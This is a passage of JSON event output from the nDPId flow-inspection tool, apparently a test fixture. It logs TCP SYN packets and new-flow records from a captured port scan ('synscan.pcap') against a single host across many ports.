-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058156,"pkt":"ACYLMQczACWzv5HuCABFAAAsG+YAACwGAI2sEAAIQA2GNIzTBRTdU4MZAAAAAGACBAAveAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058156,"pkt":"ACYLMQczACWzv5HuCABFAAAsNr8AACkG6LOsEAAIQA2GNIzTBDPdU4MZAAAAAGACCAAsWQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs4koAACcGPyisEAAIQA2GNIzTI47dU4MZAAAAAGACEAAE\/gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs28oAADsGMaisEAAIQA2GNIzTBRDdU4MZAAAAAGACEAAjfAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsncwAAC0GfaasEAAIQA2GNIzTE+3dU4MZAAAAAGACCAAcnwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsnGIAACgGhBCsEAAIQA2GNIzTABjdU4MZAAAAAGACBAA0dAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs8\/oAACkGK3isEAAIQA2GNIzTznDdU4MZAAAAAGACCABiGwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsbGUAAC4Grg2sEAAIQA2GNIzTOpzdU4MZAAAAAGACDADx7wAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsBk8AACsGFySsEAAIQA2GNIzTACDdU4MZAAAAAGACEAAobAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsNgIAAC8G43CsEAAIQA2GNIzTKYLdU4MZAAAAAGACEAD\/CQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsFUwAACgGCyesEAAIQA2GNIzTBADdU4MZAAAAAGACBAAwjAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsZxkAADgGqVmsEAAIQA2GNIzTFr7dU4MZAAAAAGACBAAdzgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsnUIAACUGhjCsEAAIQA2GNIzTHCDdU4MZAAAAAGACCAAUbAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs0jAAACkGTUKsEAAIQA2GNIzTBKPdU4MZAAAAAGACCAAr6QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsfmUAAC8Gmw2sEAAIQA2GNIzTDAXdU4MZAAAAAGACEAAchwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs9zUAADUGHD2sEAAIQA2GNIzTDvLdU4MZAAAAAGACCAAhmgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsQXsAACUG4fesEAAIQA2GNIzTIGPdU4MZAAAAAGACCAAQKQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs89cAACUGL5usEAAIQA2GNIzSF0fdUoMYAAAAAGACCAAZSAAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsbN4AADkGopSsEAAIQA2GNIzSAandUoMYAAAAAGACCAAu5gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsGdAAADQG+qKsEAAIQA2GNIzSJRzdUoMYAAAAAGACBAAPcwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsTDsAADYGxjesEAAIQA2GNIzSNrDdUoMYAAAAAGACDAD13gAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ98AACUGu5OsEAAIQA2GNIzSPSzdUoMYAAAAAGACCADzYgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsnPQAADQGd36sEAAIQA2GNIzSNJDdUoMYAAAAAGACBAD\/\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs3OIAACsGQJCsEAAIQA2GNIzSBDHdUoMYAAAAAGACEAAkXgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 